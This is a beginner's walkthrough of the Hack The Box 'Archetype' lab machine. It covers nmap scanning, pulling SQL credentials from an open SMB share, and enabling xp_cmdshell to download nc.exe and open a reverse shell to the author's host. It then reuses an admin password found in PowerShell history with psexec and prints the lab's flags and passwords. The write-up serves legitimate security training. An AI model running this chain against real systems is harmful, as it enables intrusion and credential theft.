HackTheBox - ArchType
HackTheBox - ArchType

Hack The Box Academy first machine : ArchType, if you are beginning into CTFs, here is little help .

Pre-requisites: Yes it’s a basic machine and we have just started, it would still be better to have idea of
nmap, smb, smbclient , psexec , git-clone, mssqlclient.py(and basic commands) , impacket, basic windows commands, python web-server, netcat.

First we connect and get the IP of machine, scan for open ports only.

We now run aggressive scans on those ports only that were detected in step 1 { 135,139,445,1433,47001,49668} , or you can also start from here with -p- to scan all ports.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ sudo nmap -sV -sC -A -O -T5 -p135,139,445,47001,49668,1433 10.10.10.27 -oA Archtype -vv
[sudo] password for abhinav: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-15 20:14 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating Ping Scan at 20:14
Scanning 10.10.10.27 [4 ports]
Completed Ping Scan at 20:14, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:14
Completed Parallel DNS resolution of 1 host. at 20:14, 0.33s elapsed
Initiating SYN Stealth Scan at 20:14
Scanning 10.10.10.27 [6 ports]
Discovered open port 139/tcp on 10.10.10.27
Discovered open port 445/tcp on 10.10.10.27
Discovered open port 135/tcp on 10.10.10.27
Discovered open port 49668/tcp on 10.10.10.27
Discovered open port 1433/tcp on 10.10.10.27
Discovered open port 47001/tcp on 10.10.10.27
Completed SYN Stealth Scan at 20:14, 0.42s elapsed (6 total ports)
Initiating Service scan at 20:14
Scanning 6 services on 10.10.10.27
Completed Service scan at 20:16, 62.65s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.27
Initiating Traceroute at 20:16
Completed Traceroute at 20:16, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:16
Completed Parallel DNS resolution of 2 hosts. at 20:16, 0.34s elapsed
NSE: Script scanning 10.10.10.27.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 22.62s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 1.99s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Nmap scan report for 10.10.10.27
Host is up, received reset ttl 128 (0.045s latency).
Scanned at 2021-06-15 20:14:56 IST for 92s

PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 128 Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack ttl 128 Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-06-15T14:42:50
| Not valid after:  2051-06-15T14:42:50
| MD5:   6121 7eba 5d98 d31d 8323 934b 0cea a2c4
| SHA-1: e43f 3457 4f9d e534 91bb 3017 97a1 8af5 f43b b6e3
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQLwZia/44joxNsCS0vYybZDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjEwNjE1MTQ0MjUwWhgPMjA1MTA2MTUxNDQyNTBaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK4Xpva/
| JMRfp+GRia0FeoMgsbwfmemIzJxSn1TVO3nwBX6TeICwT7K7SAxZyNdRiJYSOcPu
| nyQP91EqfpMHyPiiCCqc7ibV7lmn9bXEGbvLo76NAjZyD0eqoSNWQpHI1gVKk+0I
| zwjomOHqKzzMhSEIQ6CCINO9aB51bVLMtuJ5y34IJ1odLf3a0RYYmVkD0t/Spu4a
| frO+njDWHmcc4zv7U40tGp5sm0rlLqELWpC9AqoUDacQ6ahASMyGu6tc3mD3bLkC
| A22aoA31GLihtCTw2U8q/bj0MoTWL8f94sUchoU5xeJGe/zMEYP1WLFivZjzp4Yv
| ttk98hNAJSmNlHUCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAbpGUgLzkrFOaXLux
| znX+D25t+cZK12nMKCipFvVIr9Qik3fAc9yoqlLTyx01TnbkiwHiMPNIbKS8n+MR
| fuafpSLqwGdNHT6M/H2pgTPxuUmXVnXEdNFRB3I6Jf67U3BRh3lNSFapK+EtiEme
| aPCJnMZQnZyxAmmLMAOq1k9mGlf+a/zoOmI+x77SE/exvlmy+duLBWhvrrYkmm4o
| kFtCHZrkMUxbXdMbi9Md9hsijy6ojE+UUml6c4Jm4O2VRBvyVS+19RpMp1fATBWb
| minyiz/WfZE0TQTJFhxmdPq6ku2eMLiBjVfiVqrVgATv/dEf0GqqOUJy7HFhyQpL
| uYsPKQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2021-06-15T15:04:39+00:00; +18m12s from scanner time.
47001/tcp open  http         syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/15%OT=135%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=60C8BD44%P=x
OS:86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TS=U)OPS(O1=M5B4%O2=M5B4%O3=
OS:M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0
OS:%W6=FAF0)ECN(R=Y%DF=N%TG=80%W=FAF0%O=M5B4%CC=N%Q=)T1(R=Y%DF=N%TG=80%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4%R
OS:D=0%Q=)T4(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=N%TG=80
OS:%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h42m12s, deviation: 3h07m52s, median: 18m11s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53066/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 49748/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45578/udp): CLEAN (Timeout)
|   Check 4 (port 63282/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-06-15T08:04:20-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-15T15:04:17
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.46 ms 192.168.252.2
2   0.45 ms 10.10.10.27

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.84 seconds
           Raw packets sent: 54 (4.316KB) | Rcvd: 39 (2.108KB)
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ 

As we see SMB shares, lets find out more about them.

──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient -L \\\\10.10.10.27\\     
Enter WORKGROUP\abhinav's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

We can check which SMB shares we are able to access, Let get into backup and know more. We check the contents on the file prod.dtsConfig . We can use the get command on smbclient connected to get the file to local machine.

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient //10.10.10.27/backups                                                                                                                                                                                                       1 
Enter WORKGROUP\abhinav's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 17:50:57 2020
  ..                                  D        0  Mon Jan 20 17:50:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 17:53:02 2020

		10328063 blocks of size 4096. 8259190 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> ^C

The contents of the file are as below, we can see username and password for a user

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

From the detailed nmap scan we know port 1433 has sql on it, let try to connect using the username and password we had in the file, very evident from the text we got in backup folder.
I would also suggest to get the git clone of impacket from https://github.com/SecureAuthCorp/impacket . And it would be much better if this is installed properly and run from within the cloned folder.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py ARCHTYPE/sql_svc@ArchType.HTB -windows-auth                                                                                                                           1 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> 

We now get netcat , which we host on our machine first using the python server. We can get the nc.exe from the github link at – https://github.com/int0x33/nc.exe/blob/master/nc.exe

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.27 - - [16/Jun/2021 00:40:31] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:44:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:45:39] "GET /winpeas.bat HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:48:28] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Jun/2021 00:50:25] "GET /nc.exe HTTP/1.1" 200 -
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell "powershell wget -UseBasicParsing http://10.10.16.59:8000/nc.exe -OutFile %temp%/nc.exe"
output                                                                             

--------------------------------------------------------------------------------   

NULL                                                                               

Now we can start netcat listener on any port and execute netcat on the machine too.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ nc -nlvp 1234                                                                                                     1 
listening on [any] 1234 ...

and we execute nc from the machine too

SQL> xp_cmdshell "%temp%/nc.exe -nv 10.10.16.59 1234 -e cmd.exe"

We now get back to netcat where we got active connection listening, lets try to grab the user flag and root flag.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype]
└─$ nc -nlvp 1234                                                                                                     1 
listening on [any] 1234 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.10.27] 49676
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd %userprofile%
cd %userprofile%

C:\Users\sql_svc>cd desktop
cd desktop

C:\Users\sql_svc\Desktop>dir

dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,786,163,200 bytes free

C:\Users\sql_svc\Desktop>
C:\Users\sql_svc\Desktop>type user.txt
type user.txt
3e7b102e78218e935bf3f4951fec21a3
C:\Users\sql_svc\Desktop>cd ..
cd ..

C:\Users\sql_svc>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc

01/20/2020  06:01 AM    <DIR>          .
01/20/2020  06:01 AM    <DIR>          ..
01/20/2020  06:01 AM    <DIR>          3D Objects
01/20/2020  06:01 AM    <DIR>          Contacts
01/20/2020  06:42 AM    <DIR>          Desktop
01/20/2020  06:01 AM    <DIR>          Documents
01/20/2020  06:01 AM    <DIR>          Downloads
01/20/2020  06:01 AM    <DIR>          Favorites
01/20/2020  06:01 AM    <DIR>          Links
01/20/2020  06:01 AM    <DIR>          Music
01/20/2020  06:01 AM    <DIR>          Pictures
01/20/2020  06:01 AM    <DIR>          Saved Games
01/20/2020  06:01 AM    <DIR>          Searches
01/20/2020  06:01 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  33,834,094,592 bytes free

C:\Users\sql_svc>cd ..
cd ..

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users

01/19/2020  04:10 PM    <DIR>          .
01/19/2020  04:10 PM    <DIR>          ..
01/19/2020  11:39 PM    <DIR>          Administrator
01/19/2020  11:39 PM    <DIR>          Public
01/20/2020  06:01 AM    <DIR>          sql_svc
               0 File(s)              0 bytes
               5 Dir(s)  33,833,717,760 bytes free

C:\Users>cd Administrator
cd Administrator
Access is denied.

C:\Users>

We got the user flag, but not the root flag yet.

Let us dig more, try to find more from command history, lets see the powershell commands history

C:\Users\sql_svc\AppData\Local\Microsoft\Windows\PowerShell>cd %userprofile%\AppData\Roaming\Microsoft\Windows PowerShell\PSReadline\
type %userprofiles%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt.

net.exe use T: \\Archetype\backups /user: administrator MEGACORP_4dmin!! 
exit

So we see an admin username and password is MEGACORP_4dmin!!

Lets now get to psexec which let you execute commands on remote system after login.
Note : if the modules are not properly installed, you might spend your rest day trying to fix the errors.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype/impacket/examples]
└─$ psexec.py Administrator@10.10.10.27 cmd
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file GCtlWvSE.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service JBxd on 10.10.10.27.....
[*] Starting service JBxd.....
[!] Press help for extra shell commands

So now we can heck further as now we have the root/admin access.

$ psexec.py Administrator@10.10.10.27 cmd
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file GCtlWvSE.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service JBxd on 10.10.10.27.....
[*] Starting service JBxd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:/users/administrator

c:\Users\Administrator>cd desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of c:\Users\Administrator\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,832,914,944 bytes free

c:\Users\Administrator\Desktop>type root.txt
b91ccec3305e98240082d4474b848528
c:\Users\Administrator\Desktop>

I would not say the box was very simple to get around since the python modules we used was broken it we would not know how to and what to use for a starting point machine , specially if you are not an experienced CTF player.

What Do You Think on This ? Say Here